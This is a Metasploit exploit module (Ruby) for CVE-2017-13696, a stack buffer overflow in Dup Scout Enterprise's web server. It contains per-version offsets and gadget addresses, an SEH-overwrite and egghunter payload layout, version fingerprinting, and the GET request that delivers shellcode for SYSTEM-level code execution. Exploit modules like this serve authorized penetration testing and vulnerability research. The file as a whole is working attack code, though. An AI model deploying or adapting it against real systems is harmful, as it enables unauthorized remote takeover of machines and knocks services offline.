GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/dupscts_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
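class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  # The web interface's landing page embeds the product name and version in
  # its HTML, and that banner is the only fingerprint this module uses. The
  # version string selects the per-build stack offset and POP/POP/RET
  # address, so a missing or unexpected banner must stop the run: firing the
  # wrong target does not yield a session, it kills the service (see
  # 'Stability' below).
  VERSION_REGEX = />Dup Scout Enterprise v([\d.]+)</.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dup Scout Enterprise GET Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in the web interface of Dup Scout Enterprise versions <= 10.0.18,
          caused by improper bounds checking of the request path in HTTP GET
          requests sent to the built-in web server which can be leveraged
          to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.

          This module supports x86 versions of Dup Scout Enterprise and x86
          Windows operating systems only and has been tested successfully on
          Windows 7 SP1 (x86) and Windows XP SP0 (x86).
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'vportal', # Vulnerability discovery and PoC
            'Daniel Teixeira', # Metasploit module
            'bcoles', # Automatic targetting and additional targets
          ],
        'References' =>
          [
            ['CVE', '2017-13696'],
            ['CWE', '121'],
            ['EDB', '42557'],
            ['EDB', '49217']
          ],
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread'
          },
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Payload' =>
          {
            # The overflow travels in the GET request path, so bytes that end
            # or split the request line (NUL, tab, LF, CR, space) or act as a
            # query delimiter ('&') cannot appear in the SEH record, hunter or
            # egg.
            'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
            # Applies to the egg carried by the egghunter, not to the whole
            # request; the hunter locates the egg wherever it lands in memory.
            'Space' => 500
          },
        'Targets' =>
          [
            # 'Automatic' fingerprints the version from the landing page and
            # picks one of the explicit targets below; unknown versions fail
            # closed rather than guessing an offset.
            [ 'Automatic', { 'auto' => true } ],
            [
              'Dup Scout Enterprise v8.3.16 (x86)',
              {
                'Version' => '8.3.16',
                'Offset' => 552,
                # 0x10045543 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
                'Ret' => 0x10045543
              }
            ],
            [
              'Dup Scout Enterprise v8.4.16 (x86)',
              {
                'Version' => '8.4.16',
                'Offset' => 552,
                # 0x10045c33 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
                'Ret' => 0x10045c33
              }
            ],
            [
              'Dup Scout Enterprise v9.0.28 (x86)',
              {
                'Version' => '9.0.28',
                'Offset' => 552,
                # 0x1004d983 : pop ebx # pop ecx # ret 0x20 | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
                'Ret' => 0x1004d983
              }
            ],
            [
              'Dup Scout Enterprise v9.1.14 (x86)',
              {
                'Version' => '9.1.14',
                'Offset' => 552,
                # 0x10081b78 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
                'Ret' => 0x10081b78
              }
            ],
            [
              'Dup Scout Enterprise v9.5.14 (x86)',
              {
                'Version' => '9.5.14',
                'Offset' => 2488,
                # POP # POP # RET [libspp.dll]
                'Ret' => 0x10050ff3
              }
            ],
            [
              'Dup Scout Enterprise v9.9.14 (x86)',
              {
                'Version' => '9.9.14',
                'Offset' => 2496,
                # 0x10056c1d : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
                'Ret' => 0x10056c1d
              }
            ],
            [
              'Dup Scout Enterprise v10.0.18 (x86)',
              {
                'Version' => '10.0.18',
                'Offset' => 2496,
                # 0x10056a16 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
                'Ret' => 0x10056a16
              }
            ],
          ],
        'Notes' =>
          {
            # All gadgets live in the non-ASLR libspp.dll and each build has
            # its own offset: a wrong target or hardened build crashes the
            # web server instead of returning a shell.
            'Stability' => [ CRASH_SERVICE_DOWN ],
            'SideEffects' => [ IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          },
        'Privileged' => true,
        'DisclosureDate' => '2017-03-15',
        'DefaultTarget' => 0
      )
    )
  end

  # Fingerprints the target from its landing page.
  #
  # Returns CheckCode::Unknown when no HTTP response arrives, Safe when the
  # page carries no Dup Scout Enterprise banner, Detected when the banner
  # names a version this module has no target for, and Appears when the
  # version matches one of the explicit targets. Because AutoCheck is
  # prepended, anything other than Appears stops the exploit unless the
  # operator overrides the check.
  def check
    res = fetch_index
    return CheckCode::Unknown('Connection failed.') unless res

    version = extract_version(res)
    return CheckCode::Safe('Target is not Dup Scout Enterprise.') unless version

    unless target_for_version(version)
      return CheckCode::Detected("No targets for Dup Scout Enterprise version #{version}.")
    end

    CheckCode::Appears("Dup Scout Enterprise version #{version}.")
  end

  # Returns the version string advertised on the landing page, or nil when
  # the page has no recognisable banner. Aborts the module run with
  # Failure::Unreachable when the server does not answer at all.
  def dup_version
    res = fetch_index
    fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.') unless res

    extract_version(res)
  end

  # Maps a version string to the explicit target whose 'Version' equals it.
  # Returns nil for nil input and for versions absent from the target table
  # (the 'Automatic' entry has no 'Version' key and therefore never matches).
  def target_for_version(version)
    return unless version

    targets.find { |t| t['Version'] == version }
  end

  # Builds and sends the overflowing GET request.
  #
  # Request path layout for the chosen target:
  #   [Offset bytes of filler][SEH record: nSEH + POP/POP/RET][egghunter]
  #   [10 NOPs][egg: tag + checksum + payload][5500 bytes of filler]
  # The record overwrites the structured exception handler with the target's
  # POP/POP/RET gadget, which lands execution on nSEH; generate_seh_record
  # fills nSEH with a short jump past the record into the egghunter. The
  # hunter then scans memory for the 4-byte tag, verifies the checksum and
  # jumps to the payload, so the payload need not sit within reach of the
  # handler.
  def exploit
    my_target = target

    if target.name == 'Automatic'
      print_status('Selecting a target...')
      my_target = target_for_version(dup_version)
      unless my_target
        fail_with(Failure::NoTarget, 'Unable to automatically detect a target')
      end
    end

    print_status("Using target: #{my_target.name}")

    # A checksummed hunter avoids jumping into a partial copy of the egg
    # tag that the server may have left elsewhere in memory.
    eggoptions = {
      checksum: true,
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    sploit = rand_text_alpha(my_target['Offset'], payload_badchars)
    sploit << generate_seh_record(my_target.ret)
    sploit << hunter
    sploit << make_nops(10)
    sploit << egg
    # Trailing filler carried over from the original PoC; presumably needed
    # so the copy runs far enough to trigger the exception that dispatches
    # to the overwritten handler.
    sploit << rand_text_alpha(5500, payload_badchars)

    print_status("Sending payload (#{sploit.length} bytes) ...")

    # NOTE(review): the path must reach the server byte-for-byte; percent-
    # encoding the 'uri' would corrupt the SEH record and shellcode.
    send_request_cgi({
      'method' => 'GET',
      'uri' => sploit
    })
  end

  private

  # Fetches the web interface landing page. Returns the response object, or
  # nil when the request produced no reply.
  def fetch_index
    send_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })
  end

  # Pulls the version string out of a landing-page response body, or nil
  # when the banner is absent.
  def extract_version(res)
    res.body.scan(VERSION_REGEX).flatten.first
  end
end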